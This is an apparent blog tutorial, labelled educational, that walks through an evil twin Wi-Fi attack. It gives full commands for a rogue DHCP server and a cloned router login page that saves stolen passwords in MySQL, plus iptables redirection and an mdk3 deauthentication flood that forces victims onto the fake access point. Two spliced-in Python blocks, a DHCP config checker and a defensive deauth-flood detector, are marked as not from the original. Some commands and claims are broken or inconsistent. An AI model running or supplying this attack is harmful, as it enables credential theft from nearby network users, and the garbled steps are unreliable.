Evil Twin With Wpa2 Capture - Sun, Sep 15, 2024
How To Create An Evil Twin With Wpa2 Capture (Educational Purposes Only)
Introduction
Let’s talk about Evil Twin attacks—one of the more deceptive techniques in wireless security exploitation. Essentially, we’re going to create a rogue access point that mimics a legitimate one, tricking unsuspecting users into connecting. From there, we capture the WPA2 handshake, which can then be used to crack the network.
In this post, I’ll walk you through the process step by step, showing you how to set up the attack, capture the necessary data, and ultimately gain access. It’s a powerful method and one that demonstrates just how vulnerable networks can be, even when they appear secure.
So, if you’re ready to learn how to create an evil twin and capture WPA2 handshakes, let’s get started.
So, the first thing we’re going to do is install isc-dhcp-server on our system. The ISC DHCP server is a tool used to assign dynamic IP addresses to devices within a network. Once installed, you can configure it to handle DHCP requests, allowing clients to obtain IP addresses automatically on your network.
apt-get install isc-dhcp-server
After installing isc-dhcp-server, we need to add some stuff into dhcpd.conf located in /etc/. I’m assuming you have the same local IP structure as me (192.168.1.x). But if you have a structure like 192.168.0.x, you need to replace that in the code below. So here it is:
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 8.8.8.8;
range 192.168.1.130 192.168.1.140;
}
I will try my best to explain what each line means.
authoritative: Declares this DHCP server as the authoritative server for the network. If there are any other DHCP servers on the network, this one takes priority, and clients will listen to it for IP leases. This is important for resolving IP conflicts or incorrect leases.
default-lease-time 600: Sets the default lease time for IP addresses to 600 seconds (10 minutes). If a client doesn’t request a specific lease time, this value will be used.
max-lease-time 7200: Sets the maximum lease time to 7200 seconds (2 hours). This is the longest period a client can hold an IP address before it must renew or release the lease.
subnet 192.168.1.128 netmask 255.255.255.128 { … }: This defines the subnet as 192.168.1.128/25 (IP range: 192.168.1.128 to 192.168.1.255), with a subnet mask of 255.255.255.128. Devices in this network will get their IP addresses dynamically assigned from the defined range.
option subnet-mask 255.255.255.128: Specifies the subnet mask that will be provided to clients. This ensures clients know which part of the IP address identifies the network and which part identifies the host.
option broadcast-address 192.168.1.255: Defines the broadcast address for the subnet. This is the IP address used to send packets to all devices on the network.
option routers 192.168.1.129: Specifies the default gateway (router) that clients should use to access devices outside this subnet. In this case, it’s set to 192.168.1.129.
option domain-name-servers 8.8.8.8: Provides the Google Public DNS server (8.8.8.8) as the DNS resolver for clients. Clients will use this DNS server to resolve domain names to IP addresses.
range 192.168.1.130 192.168.1.140: Defines the IP range from 192.168.1.130 to 192.168.1.140. These are the addresses that the DHCP server will dynamically assign to devices on the network.
This configuration ensures that devices on the subnet can automatically receive the correct network settings to communicate effectively within the network and beyond.
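A quick way to catch the kind of mistake that makes a dhcpd.conf like the one above silently misbehave (a broadcast address that does not belong to the subnet, a pool that falls outside it, or a pool that overlaps the router) is to parse the block and check every address against the subnet it declares. The following is an added example written for this post, not code from the original, and not part of ISC DHCP itself; it handles only the simple "subnet … { option …; range …; }" layout shown above, and the two config texts embedded in it are constructed samples (the first is the post’s block with the missing semicolon after range supplied).

```python
import ipaddress
import re

# Constructed sample: the post's subnet block, with the semicolon after "range" added.
SAMPLE_CONF = """
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
  option subnet-mask 255.255.255.128;
  option broadcast-address 192.168.1.255;
  option routers 192.168.1.129;
  option domain-name-servers 8.8.8.8;
  range 192.168.1.130 192.168.1.140;
}
"""

# Constructed sample with two deliberate mistakes: the broadcast address belongs
# to a different subnet, and the pool includes the router's own address.
BROKEN_CONF = """
subnet 192.168.0.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option broadcast-address 192.168.1.255;
  option routers 192.168.0.1;
  range 192.168.0.1 192.168.0.50;
}
"""


def parse_dhcpd_conf(text):
    """Return (global settings dict, list of subnet dicts) for a simple dhcpd.conf."""
    settings, subnets, current = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        m = re.match(r"subnet\s+(\S+)\s+netmask\s+(\S+)\s*\{", line)
        if m:
            current = {"subnet": m.group(1), "netmask": m.group(2), "options": {}, "ranges": []}
            continue
        if line == "}":
            subnets.append(current)
            current = None
            continue
        stmt = line.rstrip(";").split()
        if current is None:                       # top-level statement
            settings[stmt[0]] = stmt[1] if len(stmt) > 1 else True
        elif stmt[0] == "option":                 # option NAME VALUE...
            current["options"][stmt[1]] = stmt[2:]
        elif stmt[0] == "range":                  # range LOW HIGH
            current["ranges"].append((stmt[1], stmt[2]))
        else:
            current[stmt[0]] = stmt[1:]
    return settings, subnets


def check_subnet(sub):
    """Return a list of consistency problems for one subnet block (empty means OK)."""
    problems = []
    net = ipaddress.ip_network(f"{sub['subnet']}/{sub['netmask']}", strict=False)
    if str(net.network_address) != sub["subnet"]:
        problems.append(f"{sub['subnet']} is not the network address of {net}")
    opts = sub["options"]
    if "subnet-mask" in opts and opts["subnet-mask"][0] != str(net.netmask):
        problems.append(f"option subnet-mask {opts['subnet-mask'][0]} differs from {net.netmask}")
    if "broadcast-address" in opts:
        bcast = ipaddress.ip_address(opts["broadcast-address"][0])
        if bcast != net.broadcast_address:
            problems.append(f"broadcast {bcast} should be {net.broadcast_address}")
    routers = [ipaddress.ip_address(r) for r in opts.get("routers", [])]
    for r in routers:
        if r not in net:
            problems.append(f"router {r} is outside {net}")
    for lo, hi in sub["ranges"]:
        lo_a, hi_a = ipaddress.ip_address(lo), ipaddress.ip_address(hi)
        if lo_a > hi_a:
            problems.append(f"range {lo}-{hi} is reversed")
        if lo_a not in net or hi_a not in net:
            problems.append(f"range {lo}-{hi} is not inside {net}")
        for r in routers:
            if lo_a <= r <= hi_a:
                problems.append(f"router {r} lies inside the pool {lo}-{hi}")
    return problems


if __name__ == "__main__":
    for name, conf in (("sample", SAMPLE_CONF), ("broken", BROKEN_CONF)):
        _, subnets = parse_dhcpd_conf(conf)
        for sub in subnets:
            print(name, sub["subnet"], check_subnet(sub) or "OK")
```

Running it reports the post’s block as consistent and lists both defects in the second sample; the same checks apply unchanged to any /25 or /24 you substitute for your own network.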
Now we need to go into /var/www, which is typically the default directory where web server files are stored (such as for Apache or Nginx). This is where you would place your website’s files, like HTML, CSS, and scripts, to serve them over the web. Anyways, we’ll go into that directory and delete the default index.html file.
PS: You need to download the login page files for the target router (ex: download the TP-Link’s login page files).
cd /var/www
rm index.html
Then we paste the router’s page files into /var/www. Now we’re ready to start our local server.
/etc/init.d/apache2 start
/etc/init.d/mysql start
mysql -u root
Inside mysql, you’ll need to create a new database to store the stolen usernames and passwords.
create database evil_twin;
use evil_twin;
create table wpa_keys(password varchar(64), confirm varchar(64));
Now that it’s done, fire up a new terminal. We’re gonna do some IP routing.
ip route {your-network-interface} {your-local-ip}
Now we need to manage wireless network interfaces. Specifically, airmon-ng puts the wireless interface into monitor mode, allowing you to capture wireless traffic. In this case, you’re targeting the interface wlan0mon, which is likely already in monitor mode. If the interface was initially wlan0, running airmon-ng start wlan0 would have switched it to wlan0mon. Monitor mode is essential for network analysis, packet capturing, and attacks like Evil Twin or WPA handshake captures.
airmon-ng start wlan0
airodump-ng -M wlan0mon
Have a look at the output. You need to copy the target’s ESSID, channel number, and BSSID.
airbase-ng -e {ESSID} -c {channel number} -P {monitor interface}
Now fire up a new terminal, don’t close airbase.
ifconfig at0 192.168.1.129 netmask 255.255.255.128
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
Now we’ll be doing some IP rerouting:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination {your-local-ip}:80
iptables -t nat -A POSTROUTING -j MASQUERADE
That completes the iptables rules. Next we’ll start the dhcpd server, so open another terminal:
mkdir -p /var/lib/dhcp
touch /var/lib/dhcp/dhcpd.leases
touch /etc/dhcpd.conf
dhcpd -t -cf /etc/dhcpd.conf -lf /var/lib/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
Now we will deauth the devices in the original target network:
echo {BSSID} > blacklist
mdk3 wlan0mon d -b blacklist -c {channel-number}
There we go! Now the devices in the target network will be disconnected, and since we’re continuously sending deauth signals to that router, target devices will have no other option than to connect to our evil twin, since their MAC addresses are the same.
And when they try to go to any website, they will face the router’s ’login’ page we’ve created. And if you’re lucky, once they enter the username and password for their router, those will be saved to our MySQL database. Boom.
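From the defender’s side, the deauth flood in the step above is also the loudest part of this attack: a legitimate access point sends the occasional deauthentication frame to a single client, while a flood sends dozens per second, usually to the broadcast address. The following is an added example written for this post (not code from the original, and not part of any wireless tool it mentions) showing the detection rule a wireless sensor would apply: count deauth/disassoc frames per BSSID in a sliding time window and raise one alert per BSSID when the count crosses a threshold. The one-line frame summary format, the window and threshold values, and the frames themselves are constructed assumptions.

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 management-frame summaries, one per line in the
# form "time subtype bssid src dst reason", as a monitor-mode sensor might
# export them.  Not a real capture: a quiet AP beaconing every 0.1 s, one
# ordinary deauth of a single client, then a broadcast deauth burst.
AP = "00:11:22:33:44:55"
CLIENT = "aa:bb:cc:dd:ee:01"
BCAST = "ff:ff:ff:ff:ff:ff"
SAMPLE_FRAMES = (
    [f"{t / 10:.2f} beacon {AP} {AP} {BCAST} -" for t in range(0, 100)]   # beacons 0.0 .. 9.9 s
    + [f"4.20 deauth {AP} {AP} {CLIENT} 3"]                               # one normal deauth
    + [f"{6 + i * 0.05:.2f} deauth {AP} {AP} {BCAST} 7" for i in range(20)]  # 20 deauths in 1 s
)


def parse_frames(lines):
    """Parse summary lines into (time, subtype, bssid, src, dst, reason), sorted by time."""
    frames = []
    for line in lines:
        t, subtype, bssid, src, dst, reason = line.split()
        frames.append((float(t), subtype, bssid.lower(), src.lower(), dst.lower(), reason))
    return sorted(frames)


def deauth_flood_alerts(frames, window=1.0, threshold=10):
    """Sliding-window detector (window and threshold are assumed tuning values).

    Keeps the timestamps of recent deauth/disassoc frames per BSSID and emits
    one alert per BSSID the first time `threshold` or more of them fall within
    any `window`-second span.  Broadcast-addressed floods are flagged, since a
    real AP has little reason to deauthenticate every client at once.
    """
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for t, subtype, bssid, src, dst, reason in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[bssid]
        q.append(t)
        while q and t - q[0] > window:          # expire frames older than the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "time": t, "count": len(q),
                           "broadcast": dst == BCAST, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in deauth_flood_alerts(parse_frames(SAMPLE_FRAMES)):
        kind = "broadcast" if a["broadcast"] else "unicast"
        print(f"[alert] {a['count']} {kind} deauth frames for BSSID {a['bssid']} "
              f"within 1 s (first crossed at t={a['time']:.2f}s, reason {a['reason']})")
```

On the constructed sample the single deauth at 4.20 s expires from the window before the burst begins, so it never contributes to an alert; the burst trips the detector at its tenth frame (t = 6.45 s). In practice the threshold should be set from a baseline of the monitored network, and a hit is best correlated with a new, unfamiliar AP advertising the same ESSID on the same channel, which is the other half of the pattern this post describes.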